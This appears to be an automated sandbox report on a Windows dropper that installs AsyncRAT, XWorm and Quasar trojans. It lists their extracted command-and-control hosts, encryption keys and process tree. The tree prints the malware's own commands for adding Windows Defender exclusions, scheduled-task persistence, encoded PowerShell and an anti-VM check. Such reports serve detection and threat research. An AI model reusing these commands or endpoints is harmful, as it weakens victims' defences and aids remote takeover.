asyncrat | 74da0ec13e96351e76edd4d76a7d15e11d4435c366c994db740dc2875c9f4816

Analysis

max time kernel
147s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
30-06-2024 04:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe
Size

39.9MB
MD5

e1a72f7e4426c8d5e849459fa7c7e476
SHA1

e1101a053ebe7cf5dc44f4f4ea787be113cae10f
SHA256

9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece
SHA512

0a2830e2f9e1872a98996f4221f1e81a33e8927e087397e7b3342fe79333974d030d8ff4176746c9cfd78eeb382d46a88023709c2e003b6a1ba00d883ee4426f
SSDEEP

786432:sxGPxJDr/A/brZCaMhEDL/BpYE0dkt3ZL3PDnsilllqs7GIKScPml8tBW:oGJJDrYPZCaEWLxVfDnplllpzMW

Score

10^/10

asyncrat quasar xworm default office04 slave execution rat spyware trojan

Malware Config

Extracted

Family

xworm

best-bird.gl.at.ply.gg:27196

super-nearest.gl.at.ply.gg:17835

wiz.bounceme.net:6000

aes.plain

Extracted

Family

asyncrat

Botnet

Default

finally-grande.gl.at.ply.gg:25844

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

history-foo.gl.at.ply.gg:42349

Mutex

2beddbf7-c691-4058-94c7-f54389b4a581

Attributes

encryption_key
CBFC5D217E55BEBDCD3A6EFA924299F76BC328D9
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Update
subdirectory
SubDir

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

stop-largely.gl.at.ply.gg:27116

Mutex

$Sxr-kl1r656AGsPQksTmi8

Attributes

encryption_key
ql4fQ8TV9ZFP9vRX2myA
install_name
$sxr~Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
$77STARTUP~MSF
subdirectory
$sxr~SubDir

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 5 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\mshta.exe	family_xworm
behavioral2/memory/628-32-0x0000000000F90000-0x0000000000FA8000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\svchost.exe	family_xworm
behavioral2/memory/4988-47-0x0000000000BE0000-0x0000000000BFA000-memory.dmp	family_xworm
behavioral2/memory/628-182-0x000000001E140000-0x000000001E14E000-memory.dmp	family_xworm

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\hat.exe	family_quasar
C:\Users\Admin\AppData\Local\Temp\Client-built.exe	family_quasar
behavioral2/memory/3996-61-0x0000000000AF0000-0x0000000000E14000-memory.dmp	family_quasar
behavioral2/memory/1992-64-0x0000000000C90000-0x0000000000CFC000-memory.dmp	family_quasar

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Async RAT payload 1 IoCs
rat

Processes:

resource yara_rule

C:\Users\Admin\AppData\Local\Temp\ONPE.exe family_asyncrat
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

808 powershell.exe
2320 powershell.exe
3768 powershell.exe
2964 powershell.exe

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\ONPE.exe	family_asyncrat

pid	process
808	powershell.exe
2320	powershell.exe
3768	powershell.exe
2964	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exe9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exesvchost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	svchost.exe

Executes dropped EXE 6 IoCs

Processes:

hat.exemshta.exeONPE.exesvchost.exeClient-built.exeindex.exe

pid process

1992 hat.exe
628 mshta.exe
1852 ONPE.exe
4988 svchost.exe
3996 Client-built.exe
4996 index.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

12 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4736 taskkill.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

3676 schtasks.exe

pid	process
1992	hat.exe
628	mshta.exe
1852	ONPE.exe
4988	svchost.exe
3996	Client-built.exe
4996	index.exe

flow	ioc
12	ip-api.com

pid	process
4736	taskkill.exe

pid	process
3676	schtasks.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exemshta.exe

pid	process
1344	powershell.exe
1344	powershell.exe
1344	powershell.exe
3708	powershell.exe
3708	powershell.exe
808	powershell.exe
808	powershell.exe
2964	powershell.exe
2964	powershell.exe
3708	powershell.exe
808	powershell.exe
2964	powershell.exe
2320	powershell.exe
2320	powershell.exe
2320	powershell.exe
3768	powershell.exe
3768	powershell.exe
3768	powershell.exe
4988	svchost.exe
4988	svchost.exe
628	mshta.exe
628	mshta.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

Client-built.exemshta.exesvchost.exeONPE.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exehat.exepowershell.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3996	Client-built.exe
Token: SeDebugPrivilege	628	mshta.exe
Token: SeDebugPrivilege	4988	svchost.exe
Token: SeDebugPrivilege	1852	ONPE.exe
Token: SeDebugPrivilege	1344	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	808	powershell.exe
Token: SeIncreaseQuotaPrivilege	2940	WMIC.exe
Token: SeSecurityPrivilege	2940	WMIC.exe
Token: SeTakeOwnershipPrivilege	2940	WMIC.exe
Token: SeLoadDriverPrivilege	2940	WMIC.exe
Token: SeSystemProfilePrivilege	2940	WMIC.exe
Token: SeSystemtimePrivilege	2940	WMIC.exe
Token: SeProfSingleProcessPrivilege	2940	WMIC.exe
Token: SeIncBasePriorityPrivilege	2940	WMIC.exe
Token: SeCreatePagefilePrivilege	2940	WMIC.exe
Token: SeBackupPrivilege	2940	WMIC.exe
Token: SeRestorePrivilege	2940	WMIC.exe
Token: SeShutdownPrivilege	2940	WMIC.exe
Token: SeDebugPrivilege	2940	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2940	WMIC.exe
Token: SeRemoteShutdownPrivilege	2940	WMIC.exe
Token: SeUndockPrivilege	2940	WMIC.exe
Token: SeManageVolumePrivilege	2940	WMIC.exe
Token: 33	2940	WMIC.exe
Token: 34	2940	WMIC.exe
Token: 35	2940	WMIC.exe
Token: 36	2940	WMIC.exe
Token: SeDebugPrivilege	1992	hat.exe
Token: SeIncreaseQuotaPrivilege	2940	WMIC.exe
Token: SeSecurityPrivilege	2940	WMIC.exe
Token: SeTakeOwnershipPrivilege	2940	WMIC.exe
Token: SeLoadDriverPrivilege	2940	WMIC.exe
Token: SeSystemProfilePrivilege	2940	WMIC.exe
Token: SeSystemtimePrivilege	2940	WMIC.exe
Token: SeProfSingleProcessPrivilege	2940	WMIC.exe
Token: SeIncBasePriorityPrivilege	2940	WMIC.exe
Token: SeCreatePagefilePrivilege	2940	WMIC.exe
Token: SeBackupPrivilege	2940	WMIC.exe
Token: SeRestorePrivilege	2940	WMIC.exe
Token: SeShutdownPrivilege	2940	WMIC.exe
Token: SeDebugPrivilege	2940	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2940	WMIC.exe
Token: SeRemoteShutdownPrivilege	2940	WMIC.exe
Token: SeUndockPrivilege	2940	WMIC.exe
Token: SeManageVolumePrivilege	2940	WMIC.exe
Token: 33	2940	WMIC.exe
Token: 34	2940	WMIC.exe
Token: 35	2940	WMIC.exe
Token: 36	2940	WMIC.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	4736	taskkill.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeDebugPrivilege	4988	svchost.exe
Token: SeDebugPrivilege	628	mshta.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Client-built.exehat.exesvchost.exemshta.exe

pid process

3996 Client-built.exe
1992 hat.exe
4988 svchost.exe
628 mshta.exe

pid	process
3996	Client-built.exe
1992	hat.exe
4988	svchost.exe
628	mshta.exe

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exeindex.execmd.execmd.exesvchost.exemshta.exepowershell.exepowershell.execsc.exehat.exe

description	pid	process	target process
PID 496 wrote to memory of 1992	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	hat.exe
PID 496 wrote to memory of 1992	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	hat.exe
PID 496 wrote to memory of 1992	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	hat.exe
PID 496 wrote to memory of 628	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	mshta.exe
PID 496 wrote to memory of 628	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	mshta.exe
PID 496 wrote to memory of 1852	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	ONPE.exe
PID 496 wrote to memory of 1852	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	ONPE.exe
PID 496 wrote to memory of 4988	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	svchost.exe
PID 496 wrote to memory of 4988	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	svchost.exe
PID 496 wrote to memory of 3996	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	Client-built.exe
PID 496 wrote to memory of 3996	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	Client-built.exe
PID 496 wrote to memory of 4996	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	index.exe
PID 496 wrote to memory of 4996	496	9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe	index.exe
PID 4996 wrote to memory of 1208	4996	index.exe	cmd.exe
PID 4996 wrote to memory of 1208	4996	index.exe	cmd.exe
PID 4996 wrote to memory of 3436	4996	index.exe	cmd.exe
PID 4996 wrote to memory of 3436	4996	index.exe	cmd.exe
PID 1208 wrote to memory of 1344	1208	cmd.exe	powershell.exe
PID 1208 wrote to memory of 1344	1208	cmd.exe	powershell.exe
PID 3436 wrote to memory of 3620	3436	cmd.exe	Conhost.exe
PID 3436 wrote to memory of 3620	3436	cmd.exe	Conhost.exe
PID 4988 wrote to memory of 2964	4988	svchost.exe	powershell.exe
PID 4988 wrote to memory of 2964	4988	svchost.exe	powershell.exe
PID 628 wrote to memory of 808	628	mshta.exe	powershell.exe
PID 628 wrote to memory of 808	628	mshta.exe	powershell.exe
PID 3436 wrote to memory of 3708	3436	cmd.exe	powershell.exe
PID 3436 wrote to memory of 3708	3436	cmd.exe	powershell.exe
PID 1344 wrote to memory of 3592	1344	powershell.exe	csc.exe
PID 1344 wrote to memory of 3592	1344	powershell.exe	csc.exe
PID 3708 wrote to memory of 2940	3708	powershell.exe	WMIC.exe
PID 3708 wrote to memory of 2940	3708	powershell.exe	WMIC.exe
PID 3592 wrote to memory of 4548	3592	csc.exe	cvtres.exe
PID 3592 wrote to memory of 4548	3592	csc.exe	cvtres.exe
PID 4988 wrote to memory of 2320	4988	svchost.exe	powershell.exe
PID 4988 wrote to memory of 2320	4988	svchost.exe	powershell.exe
PID 3708 wrote to memory of 4736	3708	powershell.exe	taskkill.exe
PID 3708 wrote to memory of 4736	3708	powershell.exe	taskkill.exe
PID 628 wrote to memory of 3768	628	mshta.exe	powershell.exe
PID 628 wrote to memory of 3768	628	mshta.exe	powershell.exe
PID 1992 wrote to memory of 3676	1992	hat.exe	schtasks.exe
PID 1992 wrote to memory of 3676	1992	hat.exe	schtasks.exe
PID 1992 wrote to memory of 3676	1992	hat.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe
"C:\Users\Admin\AppData\Local\Temp\9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:496

C:\Users\Admin\AppData\Local\Temp\hat.exe
"C:\Users\Admin\AppData\Local\Temp\hat.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$77STARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\hat.exe" /rl HIGHEST /f
3⤵
- Scheduled Task/Job: Scheduled Task
PID:3676

C:\Users\Admin\AppData\Local\Temp\mshta.exe
"C:\Users\Admin\AppData\Local\Temp\mshta.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mshta.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3768

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3620

C:\Users\Admin\AppData\Local\Temp\ONPE.exe
"C:\Users\Admin\AppData\Local\Temp\ONPE.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320

C:\Users\Admin\AppData\Local\Temp\Client-built.exe
"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3996

C:\Users\Admin\AppData\Local\Temp\index.exe
"C:\Users\Admin\AppData\Local\Temp\index.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4996

C:\Windows\system32\cmd.exe
cmd.exe /C call powershell -E QQBkAGQALQBUAHkAcABlACAAQAAiAAoAIAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAIAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzACAAewAKACAAIAAgACAAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAgACAAIAAgACAAIAAgACAACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAYQByAGUAbgB0ACgASQBuAHQAUAB0AHIAIABoAFcAbgBkACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFMAaABvAHcAVwBpAG4AZABvAHcAKABJAG4AdABQAHQAcgAgAGgAVwBuAGQALAAgAGkAbgB0ACAAbgBDAG0AZABTAGgAbwB3ACkAOwAKACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABHAGUAdABUAGEAcgBnAGUAdABXAGkAbgBkAG8AdwAoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAUAB0AHIAIABjAG8AbgBzAG8AbABlAFcAaQBuAGQAbwB3ACAAPQAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdABQAHQAcgAgAHAAYQByAGUAbgB0AFcAaQBuAGQAbwB3ACAAPQAgAEcAZQB0AFAAYQByAGUAbgB0ACgAYwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAcABhAHIAZQBuAHQAVwBpAG4AZABvAHcAIAA9AD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAYwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAcABhAHIAZQBuAHQAVwBpAG4AZABvAHcAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIgBAAAoACgBbAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKABbAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzAF0AOgA6AEcAZQB0AFQAYQByAGcAZQB0AFcAaQBuAGQAbwB3ACgAKQAsACAAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
3⤵
- Suspicious use of WriteProcessMemory
PID:1208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -E QQBkAGQALQBUAHkAcABlACAAQAAiAAoAIAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAIAAgACAAIAB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzACAAewAKACAAIAAgACAAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAgACAAIAAgACAAIAAgACAACgAgACAAIAAgACAAIAAgACAAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AFAAYQByAGUAbgB0ACgASQBuAHQAUAB0AHIAIABoAFcAbgBkACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ACgAgACAAIAAgACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFMAaABvAHcAVwBpAG4AZABvAHcAKABJAG4AdABQAHQAcgAgAGgAVwBuAGQALAAgAGkAbgB0ACAAbgBDAG0AZABTAGgAbwB3ACkAOwAKACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABHAGUAdABUAGEAcgBnAGUAdABXAGkAbgBkAG8AdwAoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHQAUAB0AHIAIABjAG8AbgBzAG8AbABlAFcAaQBuAGQAbwB3ACAAPQAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdABQAHQAcgAgAHAAYQByAGUAbgB0AFcAaQBuAGQAbwB3ACAAPQAgAEcAZQB0AFAAYQByAGUAbgB0ACgAYwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwApADsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAcABhAHIAZQBuAHQAVwBpAG4AZABvAHcAIAA9AD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAYwBvAG4AcwBvAGwAZQBXAGkAbgBkAG8AdwA7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAcABhAHIAZQBuAHQAVwBpAG4AZABvAHcAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIgBAAAoACgBbAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKABbAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAVQB0AGkAbABzAF0AOgA6AEcAZQB0AFQAYQByAGcAZQB0AFcAaQBuAGQAbwB3ACgAKQAsACAAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1344

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zibfp3km\zibfp3km.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1AA7.tmp" "c:\Users\Admin\AppData\Local\Temp\zibfp3km\CSC27E6C262D41840C7B7A8B9F6A9C885B.TMP"
6⤵
PID:4548

C:\Windows\system32\cmd.exe
cmd.exe /C call C:\Users\Admin\AppData\Local\Temp\5a12aaf792a7efda8670f53fd4fa1e3d.bat
3⤵
- Suspicious use of WriteProcessMemory
PID:3436

C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\5a12aaf792a7efda8670f53fd4fa1e3d.bat"
4⤵
PID:3620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "$d = wmic diskdrive get model;if ($d -like '*DADY HARDDISK*' -or $d -like '*QEMU HARDDISK*') { taskkill /f /im cmd.exe }"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3708

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" diskdrive get model
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Windows\system32\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im cmd.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5028 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
1⤵
PID:1796

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
e448fe0d240184c6597a31d3be2ced58

SHA1
372b8d8c19246d3e38cd3ba123cc0f56070f03cd

SHA256
c660f0db85a1e7f0f68db19868979bf50bd541531babf77a701e1b1ce5e6a391

SHA512
0b7f7eae7700d32b18eee3677cb7f89b46ace717fa7e6b501d6c47d54f15dff7e12b49f5a7d36a6ffe4c16165c7d55162db4f3621db545b6af638035752beab4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
e243a38635ff9a06c87c2a61a2200656

SHA1
ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

SHA256
af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

SHA512
4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
23909774a4f0358be8e03226d73fbd61

SHA1
4df262994ce4eb3935965881c1e2dc730668da94

SHA256
6dbd177f5aa34f836bf52885c04a3a93771384ebad954911be812c039290bcad
